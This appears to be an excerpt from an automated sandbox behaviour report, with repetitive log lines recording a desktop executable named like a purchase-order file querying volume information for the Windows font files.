Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
